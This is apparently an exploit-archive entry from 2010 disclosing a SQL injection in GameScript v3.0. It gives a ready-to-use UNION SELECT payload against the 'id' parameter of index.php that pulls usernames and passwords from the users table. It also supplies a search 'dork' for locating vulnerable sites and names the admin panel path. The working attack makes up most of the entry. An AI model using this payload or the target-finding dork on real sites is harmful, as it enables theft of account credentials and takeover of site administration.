GameScript v3.0 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : GameScript v3.0 SQL Injection Vulnerability
# Published : 2010-02-25
# Author : FormatXformat
# Previous Title : Softbiz Recipes Portal Script (showcats.php) SQL Injection Vulnerability
# Next Title : Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

Author :  FormatXformat
Home : Tkurd.net

Script : http://www.gamescript.net
Vulnerabilities : SQL Injection


Dork:

Copyright ? 2005 - 2006 GameScript.net. All Games Copyright ? To Their Respective Owners. All Rights Reserved.



Exploit:

/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--

Admin page: admincp



Demo :

http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--